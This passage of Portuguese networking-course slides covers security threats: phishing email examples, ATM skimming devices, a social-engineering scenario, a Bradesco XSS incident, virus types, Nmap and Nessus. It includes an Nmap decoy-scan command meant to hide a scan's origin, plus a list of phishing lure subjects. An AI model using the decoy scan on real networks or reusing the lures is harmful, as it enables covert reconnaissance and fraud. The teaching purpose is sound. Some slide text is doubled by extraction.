– Syn Flood – inundar a fila de SYN para negar novas conexões– Buffer overflow – colocar mais informações do que cabe no buffer– Distributed DoS (DDoS) – ataque em massa de negação de serviços– Ping of Death – envio de pacote com mais de 65507 bytes– Smurf – envio de pacote ICMP em broadcast a partir de uma

máquina, sendo inundada com as respostas recebidas– CGI exploit– Land, syn flooding, ...

• Simulação– IP Spoofing – uso do IP de uma máquina para acessar outra– DNS Spoofing – assumir o DNS de outro sistema • Investigação– Port scanning – varredura de portas para tentar se conectar e

invadir• Spam

– Acesso a um grande número de pessoas, via email, com link para sites clonados que pedem informações pessoais

Page 118: 62282591 Senai Curso Avancado Redes

Ex: Email para roubo de informações

118

Page 119: 62282591 Senai Curso Avancado Redes

Ex: Email para roubo de informações

119

Page 120: 62282591 Senai Curso Avancado Redes

Ex: Email para roubo de informações

120

Page 121: 62282591 Senai Curso Avancado Redes

Ex: Email para roubo de informações

121

Page 122: 62282591 Senai Curso Avancado Redes

Ex: Email para roubo de informações

122

Page 123: 62282591 Senai Curso Avancado Redes

Ex: Email para roubo de informações

123

Page 124: 62282591 Senai Curso Avancado Redes

Ex: Email para roubo de informações

124

Page 125: 62282591 Senai Curso Avancado Redes

Ex2: Clonagem de cartão de banco

125

Bocal preparado

Page 126: 62282591 Senai Curso Avancado Redes

Ex2: Clonagem de cartão de banco

126

Imperceptível para o cliente

Page 127: 62282591 Senai Curso Avancado Redes

Ex2: Clonagem de cartão de banco

Micro câmera disfarçada de porta panfleto

Page 128: 62282591 Senai Curso Avancado Redes

Ex2: Clonagem de cartão de banco

128

Visão completa da tela e teclas digitadas

Page 129: 62282591 Senai Curso Avancado Redes

Ex2: Clonagem de cartão de banco

129

Visão completa da tela e teclas digitadas

Page 130: 62282591 Senai Curso Avancado Redes

Ex2: Clonagem de cartão de banco

130

Micro câmera

Bateria

Antena transmissora

Page 131: 62282591 Senai Curso Avancado Redes

Ex3: Email de promoção (roubo informação)

131

Page 132: 62282591 Senai Curso Avancado Redes

Ex3: Email de promoção (roubo informação)

132

Page 133: 62282591 Senai Curso Avancado Redes

Ex4: Antivirus Gratis

133

Page 134: 62282591 Senai Curso Avancado Redes

Ex5: Engenharia Social Ao atender um telefonema, o interlocutor se

identifica como vice-diretor da empresa. Você já o viu pelos corredores, mas nunca falou com ele por telefone. Ele informa que se encontra na filial da empresa, em reunião, e está com problemas para acessar o sistema. Assim sendo, solicita a senha para que possa ter acesso. Informa, ainda, que está acompanhado de 10 pessoas que possuem outros compromissos e que não podem esperar por muito tempo.

134

Page 135: 62282591 Senai Curso Avancado Redes

Ex6: Email Receita Federal

135

Page 136: 62282591 Senai Curso Avancado Redes

Cópia de identidade visual de órgãos públicos

Pedido de download de

arquivos / erros de

português

Page 137: 62282591 Senai Curso Avancado Redes

Cópia de identidade visual de entidades populares

História estranha e

mal contada

Necessidade urgente de download

Page 138: 62282591 Senai Curso Avancado Redes

Serviço inexistente

Pedido de download de arquivos

Ameaças

Page 139: 62282591 Senai Curso Avancado Redes

Uso de marca popular Distrbuição muito vantajosa

de prêmios

Pedido de download de

arquivo

Page 140: 62282591 Senai Curso Avancado Redes

Uso de marca popular

Erro de português

Dívida inexistente

Falta de menção a endereço por extenso

Page 141: 62282591 Senai Curso Avancado Redes

Erro de português

Page 142: 62282591 Senai Curso Avancado Redes

Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-inst-xss/)

142

Criminosos brasileiros conseguiram descobrir um problema em uma página do Bradesco que permitia que a mesma fosse “alterada” por meio de links, possibilitando o uso do domínio do banco para todo tipo de atividade maliciosa.Para tal, crackers enviaram e-mail em massa contendo um link que explorava uma falha de XSS (Cross Site Scripting) existente em uma página localizada em institucional.bradesco.com.br. Se clicado, o link enviava informações à página que causavam um comportamento indesejável, fazendo com que argumentos da query string — como é chamada a parte do link depois do ponto de interrogação (”asp?…”) — fossem inseridas como código, permitindo o ataque.Dias antes da publicação desta matéria, a Linha Defensiva notificou o Bradesco. O banco removeu a página vulnerável dentro de aproximadamente 48 horas, inutilizando o ataque. A mensagem contendo o link que explorava a brecha solicitava o recadastramento das “chaves de segurança” usadas nas transações através da Internet, convidando o usuário a fazê-lo por meio do link.

Page 143: 62282591 Senai Curso Avancado Redes

Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-inst-xss/)

Como é demonstrado na imagem, a maioria dos navegadores e os programas de e-mails não exibem o endereço completo de uma URL, se esta for muito extensa, não permitindo que a existência do golpe seja percebida.Embora o e-mail tenha usado uma técnica refinada que facilmente poderia enganar até mesmo usuários com certa experiência, devido ao link camuflado, erros de ortografia característicos de golpes e fraudes se faziam presentes. Aparentemente, o sistema de e-mail em massa usado pelos criminosos não era compatível com caracteres especiais, como acentos.

143

Page 144: 62282591 Senai Curso Avancado Redes

Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-inst-xss/)

144

XSSCross Site Scripting, ou XSS, é um tipo de vulnerabilidade onde determinada página de internet não filtra suficientemente as informações enviadas pelo navegador web, sendo possível fazê-la exibir conteúdos de outros sites, ou conteúdos especificados no próprio link ou outra informação.Um exemplo clássico é a página de busca. Em geral, páginas de buscas exibem na tela a informação que está sendo procurada (por exemplo, “Você está procurando por: [termo de pesquisa]“). Se a exibição desta informação não for filtrada corretamente, a informação, em vez de exibida, será interpretada como código HTML pelo navegador, possibilitando o ataque.Fóruns, livros de visitas e blogs (este último, devido à função de comentários) podem ser vítimas do XSS permanente, onde um post malicioso, por exemplo, fica permanentemente no ar e afetará qualquer usuário que o ver. Este é o ataque de XSS persistente, ou tipo 2.O Bradesco foi alvo do XSS impermanente ou não-persistente, também chamado de XSS tipo 1.O objetivo de ataques XSS é geralmente roubar informações importantes da vítima, tais como os cookies de autenticação. Porém, XSS também pode ser usado para alterar os sites e usar da confiança depositada pelo internauta na página para persuadi-lo a enviar informações sigilosas, ou para rodar código malicioso nos PCs de visitantes.A Linha Defensiva já noticiou a respeito de brechas semelhantes no YouTube e no Orkut.Para se prevenir de ataques XSS impermanentes, recomenda-se que links recebidos em mensagens de e-mail e similares não sejam clicados, a não ser quando estava-se esperando absolutamente o e-mail em questão (como, por exemplo, depois de registrar-se em um site para validar sua conta). Sempre que possível, deve-se digitar o endereço do site na barra de endereços do navegador e procurar manualmente o que foi indicado no e-mail.Brechas de XSS tipo 2 são difíceis de serem evitadas pelo usuário, sendo a responsabilidade do site nesses casos ainda maior, embora, em última instância, a responsabilidade sempre seja do site.

Page 145: 62282591 Senai Curso Avancado Redes

Falha no site do Bradesco permitiu ataque XSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-inst-xss/)

Ao acessar o link, o internauta era direcionado para uma página do Bradesco (Index_Pesquisa.asp) que, vulnerável a XSS, carregava outra página, hospedada em um domínio brasileiro (cujo nome não foi divulgado por se tratar de um domínio legítimo comprometido). Em ataques XSS, páginas legítimas são usadas de forma maliciosa e um código (no caso acima, um FRAMESET1) é inserido na página legítima. O conteúdo da página será, portanto, diferente do esperado.

145

Page 146: 62282591 Senai Curso Avancado Redes

Lista de Hackers fornecida: Amores On-line - cartão virtual - Equipe Carteiro Romântico - Uma pessoa

que lhe admira enviou um cartão As fotos que eu tinha prometido. Álbum pessoal de fotos AVG Antivírus - Detectamos que seu E.Mail está enviando mensagens

contaminadas com o vírus w32. bugbear Aviso - você está sendo traído - veja as fotos Aviso - você está sendo traído - veja as imagens do motel Banco do Brasil informa - Sua chave e senha de acesso foram bloqueados -

Contrato Pendente - Clique para fazer atualização Big Brother Brasil - ao vivo - quer ver tudo ao vivo e ainda concorrer a

promoções exclusivas? Clique na fechadura Câmara dos Dirigentes Lojistas - SPC - Serviço de Proteção ao Crédito -

Notificação - Pendências Financeiras - Baixar o arquivo de relatório de pendências.

carnaval 2005 - veja o que rolou nos bastidores do carnaval de São Paulo Cartão Terra - eu te amo - webcard enviado através do site Cartões Terra Cartão UOL - I love you - você recebeu um cartão musical - Para visualizar e

ouvir escolha uma das imagens Cartões BOL - Você recebeu um cartão BOL Cartõesnico.com - Seu amor criou um cartão para você Checkline - Consultas de crédito on-line - Consultas no Serasa/SPC Claro Idéias - Grande chance de ganhar meio milhão de reais em ouro e 18

carros Colaneri e Campos Ltda - Ao Gerente de Vendas - orçamento de material e

equipamentos em urgência

Page 147: 62282591 Senai Curso Avancado Redes

Lista de Hackers fornecida: Correio Virtual - hi5 - Seu Amor te enviou este cartão CPF cancelado ou pendente de regularização - verifique; seu CPF está

cancelado Declaração de Imposto de Renda de 2005/06 - Ministério da Fazenda - CPF

Cancelado ou Pendente de Regularização Ebay - your account could be suspended - Billing Department Embratel - Comunicado de Cobrança - Aviso de Bloqueio Embratel - Notificação Confidencial - Fatura de serviços prestados Clique

para detalhamento da fatura Emotion Cards - UOL - Parabéns você recebeu um Presente Virtual Febraban - Guia de Segurança - Febrasoft Security Finasa - Nossa Caixa - Fraudes Bancárias - Febraban Fininvest - débito em atraso - pendências financeiras em seu CPF/CNPJ Ganhe uma viagem a Paris - Guia Paris Lumiére Gmail - Gmail Amigo Oculto - Baixar Formulário - E-mail de 1 Giga Humortadela - Piada animada sempre amigos Humortadela - você é 10 - acesse o link e sacaneie Humortadela - você recebeu uma piada animada - Ver Piada Animada Ibest - acesso grátis e fácil - discador ibest - 0800 conexão sem pulso

telefônico. Grátis - Download Larissa 22 aninhos - www. mclass. com. br - clique aqui e veja o vídeo Leiam esta informação IMPORTANTe Martins Com Ltda - Setor de Compras - Orçamento Mercado Livre - Aviso - Saldo devedor em aberto na sua conta - e

pagamento não for quitado acionaremos departamento jurídico

Page 148: 62282591 Senai Curso Avancado Redes

Lista de Hackers fornecida: Olá, há quanto tempo! Eu me mudei para os Estados Unidos, e perdemos

contato... Olha o que a Globo preparou para você neste ano de 2005 - Big Brother

Brasil 5 - Baixe o vídeo Overture - Promoção para novos assinantes - Tem cliente procurando, tem

você oferecendo, vamos juntar os dois. Seja encontrado por quem quer comprar

Paparazzo - globo. com - se você gostou de uma espiada no vídeo Parperfeito - Você foi adicionado aos prediletos - Associado do Par Perfeito Passe Livre de 7 dias no Globo Media Center Promoção Fotolog.net e UBBI - sorteio de 10 Gold Cam por dia - Crie seu

fotolog e concorra Radio Terra - dedique uma música Receita Federal - CPF cancelado ou pendente de regularização Saudades de você - Sou alguém que te conheceu há muito tempo, e tive

que fazer uma viagem - Espero que goste das fotos SERASA - pendências referentes a seu nome - Extrato de débito SERASA - Regularize seu CPF ou CNPJ - clique para extrato de débitos Sexy Clube - Thaty Rio - Direto do Big Brother - Veja as fotos em primeira

mão Sou um amigo seu - você está sendo traído - veja as fotos Symantec - Faça sua atualização do Norton 2005 aqui - Gratuita - Licença

para 1 ano grátis Terra Cartões - O meu melhor presente é você Tim pós pago - pendências no SPC - Sistema de Proteção aoCrédito - Serial

do Celular

Page 149: 62282591 Senai Curso Avancado Redes

Lista de Hackers fornecida: Microsoft - Ferramenta de remoção de softwares Mal-Intencionados do

Microsoft Windows - Windows XP fica a cara de quem recebe um cartão Voxcards

Microsoft Software - Este conteúdo foi testado e é fornecido a você pela Microsoft Corporation - Veja as novidades

Music Cards - Confirmação Necktsun Comércio Ltda - Palmas - Departamento de Vendas -

Orçamento Netcard Cartões Virtuais - Emoções de verdade Norton Antivírus - Alerta de Segurança - download do antídoto para o Ms.

Bruner Notificação Confidencial - Pendências Financeiras em seu CPF O carteiro - você recebeu um cartão de quem te admira O carteiro. com - tenho uma novidade para você - veja o cartão que

preparei Voxcards - cartão voxcards - para quem você vai mandar um cartão

hoje? Voxcards - mensageiro - você está recebendo um cartão virtual voxcards

- Precisa instalar o plugin - clique para instalar Webcard Terra - Feliz Dia das Mães - Existe um presente especial

esperando por você no site de cartões do terra. Week - Complimentary Subscription Confirmation - Free - Please Apply

online - PC Week www. symantec. com - A solução Antivírus mais confiável do mundo www.microsoft. com - Proteja seu computador com antivírus

Page 150: 62282591 Senai Curso Avancado Redes

Lista de Hackers fornecida: UOL - Promoção Cultural - Cara cadê meu carro UOL Cartões - Estou com saudades - clique para visualizar UOL Cartões - Seu amor lhe enviou um cartão - clique para baixar UOL Cartões - Você recebeu um lindo cartão virtual Veja as fotos proibidas das musas do bbb5 Viagens contaminadas com o w32. bugbear Virtual Cards - Um grande abraço da equipe virtual cards - ler cartão VIVO - Torpedos Web Gratuito - Torpedo Fácil Vivo Yahoo Cartões - Você é tudo para mim - clique na imagem Yahoo Cartões - Você é tudo para mim - enviado por quem te admira Outra dica importante: nunca abra E-Mails de remetentes

desconhecidos! Sempre desconfie de E-Mails que solicitam 'clique aqui' ou ' acesse o

link (tal)' ou ' veja minha foto' ou ' te encontrei , lembra-se de mim? ' ou ' ligue-me para sairmos' , etc...

E, finalmente, para ter certeza que é de um golpe que você está sendo vítima, passe o mouse - sem clicar - pela palavra do direcionamento : você vai ver, na barra inferior - à esquerda da tela -, que se trata de um arquivo com a terminação 'exe' ou 'scr' ou outra. Arquivo este(s) que vai (vão) espionar seu computador, roubando seus dados, senhas, etc.

Page 151: 62282591 Senai Curso Avancado Redes

Symantec: relatório mapeia mercado negro de dados Um estudo conduzido pela Symantec mapeou o mercado negro de dados.

O relatório traz o preço das informações negociadas por criminosos e mostra como as empresas podem ter prejuízos com a vulnerabilidade dos dados dos clientes.

Segundo Marcelo Silva, diretor de serviços da companhia no Brasil, já existe um ecossistema criado em torno do roubo de dados. “Quem rouba nem sempre vende os dados. A gente fala de crime organizado, mas o que existe é um grande mercado”, afirma o executivo. Veja tabela com o preço dos dados no mercado negro:

Produto Preço Contas bancárias de 10 dólares a mil dólares Cartões de crédito de 0,40 dólar a 20 dólares Identidades completas de 1 dólar a 15 dólares   Contas do eBay de 1 dólar a 18 dólares Senhas de e-mail de 4 dólares a 30 dólares Proxies de 1,5 dólar a 30 dólares

CW Connect - No grupo de discussão sobre Crimes Digitais do CW Connect, a primeira rede social para profissionais de tecnologia da informação e telecomunicações do mercado, uma das participantes - a analista Fabiana - inseriu uma pesquisa sobre as principais ameaças às informações da empresa:

1 - Vírus 75% (Por falta de conhecimento os usuários baixam programas sem conhecimento, acessam sites suspeitos, etc)2 - Divulgação de senhas 57%3 - Hackers 44%4 - Funcionários insatisfeitos 42%5 - Acessos indevidos 40%6 - Vazamento de informações 33%

Page 152: 62282591 Senai Curso Avancado Redes

152

Page 153: 62282591 Senai Curso Avancado Redes

153

Técnicas para Alcançar os Objetivos da Segurança Deve-se perguntar:

– Proteger O QUÊ?– Proteger DE QUEM?– Proteger A QUE CUSTOS?– Proteger COM QUE RISCOS?

O axioma da segurança é bastante conhecido de todos, mas é verdadeiro:– "Uma corrente não é mais forte do que o

seu elo mais fraco"

Page 154: 62282591 Senai Curso Avancado Redes

154

Custo de Segurança:

Page 155: 62282591 Senai Curso Avancado Redes

155

Custo Visiveis x Invisiveis:

Page 156: 62282591 Senai Curso Avancado Redes

A maioria dos A maioria dos ataques ataques acontece acontece

aquiaqui

Produto Produto LançadoLançado

VulnerabilidadeVulnerabilidadedescobertadescoberta

Fix Fix disponívdisponív

elel

Fix instalado Fix instalado pelo clientepelo cliente

Atualização do ambienteQuando as ameaças ocorrem?

Page 157: 62282591 Senai Curso Avancado Redes

Produto Produto LançadoLançado

VulnerabilidadeVulnerabilidadedescobertadescoberta

Fix Fix disponíveldisponível

Fix instalado Fix instalado pelo clientepelo cliente

O tempo (em dias) entre a disponibilização da correção e a

invasão tem diminuído, portanto a aplicação de “patches” não pode ser a única defesa em grandes

empresas

Invasão

151151180

180

331331

BlasteBlasterr

WelchiWelchia/ a/

NachiNachi

NimdNimdaa

2525

SQL SQL SlammSlamm

erer

1414

SasserSasser

Atualização do ambienteTempo para a invasão diminuindo

Page 158: 62282591 Senai Curso Avancado Redes

Atualização do ambienteWorm Zotob

09/08 - A Microsoft publica a correção

11/08 - A Microsoft informa que um ataque está na eminencia de acontecer sobre essa vulnerabilidade

17/08 - CNN e ABC são atacadas

Page 159: 62282591 Senai Curso Avancado Redes

Principais Ameaças

9ª edição da Pesquisa Nacional de Segurança da Informação da Módulo Security

Page 160: 62282591 Senai Curso Avancado Redes

Principais Obstáculos

9ª edição da Pesquisa Nacional de Segurança da Informação da Módulo Security

Page 161: 62282591 Senai Curso Avancado Redes

Análise de Segurança

161

São falhas em serviços, aplicativos e sistemas operacionais que pode acarretar acesso ao sistemas parcial ou total em nível de administração.

Hoje temos ferramentas de escaneamento de vulnerabilidades que detecta falhas de sistemas, mais também são utilizadas para invasão.

Segundo o site sectools.org temos as 10 principais ferramentas de escaneamento de vulnerabilidades de sistemas.

– Nessus, GFI LANguard, Retina, Core Impact, ISS Internet Scanner, X-scan, Sara, QualysGuard, SAINT, MBSA

Page 162: 62282591 Senai Curso Avancado Redes

162

Soluções para a Insegurança Informática NMAP - É uma ferramenta para exploração de rede

criada pelo Fyodor. É uma das ferramentas mais importantes para engenharia de segurança ou pen-tester. Com ele você poderá entrar em uma rede e buscar serviços que estão escutando em cada porta especifica. Você pode fazer um varredura de tcp()connect que fará uma conexão completa com o host ou uma syn scan que fará uma simples conexão que servirá para testar regras de firewall por exemplo.

Page 163: 62282591 Senai Curso Avancado Redes

163

Soluções para a Insegurança Informática NMAP (I)

Alvo:MS-Windows 95

modificado

Page 164: 62282591 Senai Curso Avancado Redes

164

Soluções para a Insegurança Informática NMAP (II)

Alvo:Linux Mandrake

modificado

Page 165: 62282591 Senai Curso Avancado Redes

165

Soluções para a Insegurança Informática NMAP (comandos)

Um rastreio(scan) típico do Nmap é mostrado em Example 1, “Uma amostra de rastreio(scan) do Nmap”. Os únicos argumentos que o Nmap utiliza nesse exemplo são -A para permitir a detecção de SO e a versão -T4 para execução mais rápida e os nomes de anfitrião(hostnames) de dois alvos.

Page 166: 62282591 Senai Curso Avancado Redes

166

Soluções para a Insegurança Informática NMAP (comandos - Ubuntu)

Version detection: Após as portas TCP e/ou UDP serem descobertas por algum dos métodos, o nmap irá determinar qual o serviço está rodando atualmente. O arquivo nmap-service-probes é utilizado para determinar tipos de protocolos, nome da aplicação, número da versão e outros detalhes

Page 167: 62282591 Senai Curso Avancado Redes

167

Soluções para a Insegurança Informática NMAP (comandos - Ubuntu)

D <decoy1,[decoy2],[SEU_IP]...>Durante uma varredura, utiliza uma série de endereços falsificados, simulando que o scanning tenha originado desses vários hosts, sendo praticamente impossível identificar a verdadeira origem da varredura.

sudo nmap -D IP1,IP2,IP3,IP4,IP6,SEU_IP 192.168.0.1

Page 168: 62282591 Senai Curso Avancado Redes

168

Soluções para a Insegurança Informática Análise de Segurança

– Método de detecção remota de vulnerabilidades• Aplicações como o NMAP não tiram conclusões• Existe outro tipo de aplicação que efectua o levantamento

remoto de recursos, detecta vulnerabilidades, alerta o utilizador ou lança ataques

– NESSUS (Nessus Security Scanner)• É uma ferramenta sofisticada que funciona de forma semi-

automática• Pode ser usada para obter relatórios de segurança

informática• Também pode ser utilizada para “atacar “ uma plataforma• Incorpora ataques de negação de serviço, teste de

exploits, etc• Facilita muito a actividade dos crackers

Page 169: 62282591 Senai Curso Avancado Redes

169

Soluções para a Insegurança Informática NESSUS - Até há pouco tempo o Nessus só funcionava no Linux,

mas recentemente foi lançado o Nessus para Windows. É uma excelente ferramenta designada para testar e descobrir falhas de segurança (portas, vulnerabilidades, exploits) de uma ou mais máquinas.

- Estas falhas ou problemas podem ser descobertos por um grupo hacker, um único hacker, uma empresa de segurança ou pelo próprio fabricante, podendo ser de maneira acidental ou proposital, O Nessus ajuda a identificar e resolver estes problemas antes que alguém tire vantagem destes com propósitos maliciosos.

Page 170: 62282591 Senai Curso Avancado Redes

170

Soluções para a Insegurança Informática NESSUS

Alvo: Linux SuSE

Detectando Nmap

Page 171: 62282591 Senai Curso Avancado Redes

171

Soluções para a Insegurança Informática NESSUS

Alvo: MS-Windows 95

Detectando Nmpa

Page 172: 62282591 Senai Curso Avancado Redes

172

Soluções para a Insegurança Informática NESSUS

Alvo: Linux RedHat após instalação

Page 173: 62282591 Senai Curso Avancado Redes

173

Soluções para a Insegurança Informática NESSUS

Verificação da pópria máquina

Page 174: 62282591 Senai Curso Avancado Redes

Soluções para a Insegurança Informática NESSUS - Report

Page 175: 62282591 Senai Curso Avancado Redes

NESSUS – Report com formato HTML

Soluções para a Insegurança Informática

Page 176: 62282591 Senai Curso Avancado Redes

VÍRUS

Page 177: 62282591 Senai Curso Avancado Redes

Tipos de Virus Vírus de Boot

Um dos primeiros tipos de vírus conhecido, o vírus de boot infecta a partição de inicialização do sistema operacional. Assim, ele é ativado quando o computador é ligado e o sistema operacional é carregado.

Time BombOs vírus do tipo "bomba de tempo" são programados para se ativarem em determinados momentos, definidos pelo seu criador. Uma vez infectado um determinado sistema, o vírus somente se tornará ativo e causará algum tipo de dano no dia ou momento previamente definido. Alguns vírus se tornaram famosos, como o "Sexta-Feira 13" e o "Michelangelo". Minhocas, worm ou vermesCom o interesse de fazer um vírus se espalhar da forma mais abrangente possível, seus criadores por vezes, deixaram de lado o desejo de danificar o sistema dos usuários infectados e passaram a programar seus vírus de forma que apenas se repliquem, sem o objetivo de causar graves danos ao sistema. Desta forma, seus autores visam tornar suas criações mais conhecidas na Internet. Este tipo de vírus passou a ser chamada de verme ou worm. Eles estão mais aperfeiçoados, já há uma versão que ao atacar a máquina hospedeira, não só se replica, mas também se propaga pela internet pelos e-mail que estão registrados no cliente de e-mail, infectando as máquinas que abrirem aquele e-mail, reiniciando o ciclo

Page 178: 62282591 Senai Curso Avancado Redes

Tipos de Virus (cont) Trojans ou cavalos de Tróia

Certos vírus trazem em seu bojo um código a parte, que permite a um estranho acessar o micro infectado ou coletar dados e enviá-los pela Internet para um desconhecido, sem notificar o usuário. Estes códigos são denominados de Trojans ou cavalos de Tróia.Inicialmente, os cavalos de Tróia permitiam que o micro infectado pudesse receber comandos externos, sem o conhecimento do usuário. Desta forma o invasor poderia ler, copiar, apagar e alterar dados do sistema. Atualmente os cavalos de Tróia agora procuram roubar dados confidenciais do usuário, como senhas bancárias.Os vírus eram no passado, os maiores responsáveis pela instalação dos cavalos de Tróia, como parte de sua ação, pois eles não têm a capacidade de se replicar. Atualmente, os cavalos de Tróia não mais chegam exclusivamente transportados por vírus, agora são instalados quando o usuário baixa um arquivo da Internet e o executa. Prática eficaz devido a enorme quantidade de e-mails fraudulentos que chegam nas caixas postais dos usuários. Tais e-mails contém um endereço na Web para a vítima baixar o cavalo de Tróia, ao invés do arquivo que a mensagem diz ser. Esta prática se denomina phishing,expressão derivada do verbo to fish, "pescar" em inglês. Atualmente, a maioria dos cavalos de Tróia visam sites bancários, "pescando" a senha digitada pelos usuários dos micros infectados. Há também cavalos de Tróia que ao serem baixados da internet "guardados" em falsos programas ou em anexos de e-mail, encriptografam os dados e os comprimem no formato ZIP. Um arquivo .txt dá as "regras do jogo": os dados foram "seqüestrados" e só serão "libertados" mediante pagamento em dinheiro para uma determinada conta bancária, quando será fornecido o código restaurador. Também os cavalos de tróia podem ser usados para levar o usuário para sites falsos, onde sem seu conhecimento, serão baixados trojans para fins criminosos, como aconteceu com os links do google, pois uma falha de segurança poderia levar um usuário para uma página falsa. Por este motivo o serviço esteve fora do ar por algumas horas para corrigir esse bug, pois caso contrário as pessoas que não distinguissem o site original do falsificado seriam afetadas.

HijackersHijackers são programas ou scripts que "sequestram" navegadores de Internet, principalmente o Internet Explorer. Quando isso ocorre, o hijacker altera a página inicial do browser e impede o usuário de mudá-la, exibe propagandas em pop-ups ou janelas novas, instala barras de ferramentas no navegador e podem impedir acesso a determinados sites (como sites de software antivírus, por exemplo).

Page 179: 62282591 Senai Curso Avancado Redes

Tipos de Virus (cont) Vírus no Orkut

Em torno de 2006 e 2007 houve muitas ocorrências de vírus no Orkut que é capaz de enviar scraps (recados) automaticamente para todos os contatos da vítima na rede social, além de roubar senhas e contas bancárias de um micro infectado através da captura de teclas e cliques. Apesar de que aqueles que receberem o recado precisam clicar em um link para se infectar, a relação de confiança existente entre os amigos aumenta muito a possibilidade de o usuário clicar sem desconfiar de que o link leva para um worm. Ao clicar no link, um arquivo bem pequeno é baixado para o computador do usuário. Ele se encarrega de baixar e instalar o restante das partes da praga, que enviará a mensagem para todos os contatos do Orkut. Além de simplesmente se espalhar usando a rede do Orkut, o vírus também rouba senhas de banco, em outras palavras, é um clássico Banker.

KeyloggerO KeyLogger é uma das espécies de vírus existentes, o significado dos termos em inglês que mais se encaixa no contexto seria: Capturador de teclas. Ao serem executados, normalmente os keyloggers ficam escondidos no sistema operacional, sendo assim a vítima não tem como saber que está sendo monitorada. Atualmente os keyloggers são desenvolvidos para meios ilícitos, como por exemplo roubo de senhas bancárias. São utilizados também por usuários com um pouco mais de conhecimento para poder obter senhas pessoais, como email, orkut, MSN, entre outros. Existem tipos de keyloggers que capturam a tela da vítima, sendo assim, quem implantou o keylogger tem controle sobre o que a pessoa está fazendo no computador.

Estado ZumbiO estado zumbi em um computador ocorre quando é infectado e está sendo controlado por terceiros. Podem usá-lo para disseminar, vírus , keyloggers, e procededimentos invasivos em geral. Usualmente esta situação ocorre pelo fato da máquina estar com seu Firewall e ou Sistema Operacional desatualizados. Segundo estudos na área, um computador que está na internet nessas condições tem quase 50% de chance de se tornar uma máquina zumbi, que dependendo de quem está controlando, quase sempre com fins criminosos, como acontece vez ou outra, quando crackers são presos por formar exércitos zumbis para roubar dinheiro das contas correntes e extorquir.

Page 180: 62282591 Senai Curso Avancado Redes

Tipos de Virus (cont) Vírus de E-mail

Até pouco tempo atrás não existiam vírus de E-mail e todos os textos que circulavam sobre isso eram Hoax (trotes). Recentemente surgiram novos tipos de worm, que se propagam por mails e não necessitam que se execute qualquer programa anexado ou não a mensagens como por exemplo: KakWorm, Romeu e Julieta e Davinia.KakWorm : Só ataca as versões inglesa e francesa do Outlook. Para que a contaminação aconteça basta que uma mensagem contaminada seja exibida no “painel de visualização”, sem necessidade de abrir o mail. Além de sua autopropagação, o principal efeito consiste no desligamento do computador. Ele se aloja no final de cada mensagem enviada como se fosse uma assinatura e todas as mensagens levarão consigo o KakWorm. Todo  primeiro dia do mês, às17hs, é apresentada a mensagem:  “Kagou-Anti-Kro$oft says not today!”. Em seguida, o computador é desligado. Romeu e Julieta : Ataca os computadores que usam as versões 4.0, 4.01, 5.0, e 5.01 do navegador Internet Explorer em computadores que usam o Windows 95, 98, Me ou 2000. Ele se autopropaga por meio do envio de mensagens e causa instabilidades no computador contaminado. Uma característica desse worm é que o assunto (subject) da mensagem que contém o vírus varia e é selecionado aleatoriamente entre os seguintes:Romeo&Juliet  -  where is my juliet   -  where is my romeo ?  -  hi  -  last wish ???   -  lol :)   -  ,,,…   -  !!!   -  newborn   - merry christmas!   -  surprise !   -  Caution: NEW VIRUS !   -  scandal !   -  ^_^   -  Re:   -   Romeo&Juliet   - <>  :))))))  -   hello world   -   !!??!?!?   -  subject   -   ble bla, bee   -   I Love You ;)   -  sorry…   -   Hey you !   -   Matrix has you…   -   my picture from shake-beerDavinia: É capaz de contaminar e de autopropagar-se sem a existência de um arquivo anexado à mensagem, danifica todos os arquivos .html e os deixa irrecuperáveis.

Page 181: 62282591 Senai Curso Avancado Redes

Tipos de Virus (cont) Vírus de macro

Quando se usa alguns programas, por exemplo um editor de texto, e necessita-se executar uma tarefa repetidas vezes em seqüência (por exemplo substituir todos os “eh” por “é”) pode-se editar um comando único para efetuá-las. Esse comando é chamado de macro, que pode ser salvo em um modelo para ser aplicado em outros arquivos. Além dessa opção da própria pessoa fazer um modelo os comandos básicos dos editores de texto também funcionam com modelos. Os vírus de macro atacam justamente esses arquivos comprometendo o funcionamento do programa. Os alvos principais são os próprios editores de texto (Word) e as planilhas de cálculo (Excel).A disseminação desse tipo de vírus é muito mais acentuada pois documentos são muito móveis e passam de máquina em máquina . Ao escrever, editar ou, simplesmente, ler arquivos vindos de computadores infectados a contaminação ocorre. Assim, verdadeiras “epidemias” podem acontecer em pouco tempo. Além disso, os macrovírus constituem a primeira categoria de vírus multiplataforma, ou seja, não se limitam aos computadores pessoais, podendo infectar também outras plataformas que usem o mesmo programa, como o Macintosh, por exemplo.

Page 182: 62282591 Senai Curso Avancado Redes

Phishing scam Bastante comum, esse tipo de golpe virtual é baseado no

envio de e-mails sugerindo que os internautas baixem arquivos ou visitem sites maliciosos. Outra possibilidade para enganar os usuários da web é a oferta de links, também para páginas fraudulentas, em variados sites, blogs e redes sociais.

Quando aceitam a sugestão dos piratas, abrindo os arquivos ou visitando esses endereços, as vítimas em potencial podem infectar seus computadores involuntariamente com programas maliciosos. Geralmente, essas pragas instaladas na máquina têm como objetivo roubar informações pessoais dos usuários de internet.  

182

Page 183: 62282591 Senai Curso Avancado Redes

Phishing scam

183

Page 184: 62282591 Senai Curso Avancado Redes

184

Page 185: 62282591 Senai Curso Avancado Redes

O que significa SPAM

O termo SPAM origina-se de um programa de série inglesa de comédia onde os clientes pediam repetidamente “SPAM”, marca de um presunto enlatado americano.

Na informática significa enviar mensagens para qualquer quantidade de usuários, sem obter prévia autorização.

Page 186: 62282591 Senai Curso Avancado Redes

Como Evitar SPAM Existem diversas formas de bloqueio de

mensagens não solicitadas. Vários programas fazem esse serviço, como por exemplo, o SPAM Assassin. São configurados para bloquear as mensagens vindas de endereços conhecidos que disseminam essas mensagens. Bloqueia-se também as mensagens contendo alguma palavra ou expressão específica, por exemplo:

“Compre um notebook” “Troque seus cartuchos de impressoras” “Free teen images”

Page 187: 62282591 Senai Curso Avancado Redes

Incidencia de Ataques (Brasil) fonte NICBr

ataque-servidor6% ataque-usuario

4%

axfr32%

scan30%

spam24%

dos1%

fraude0%invasao

3%

Page 188: 62282591 Senai Curso Avancado Redes

188

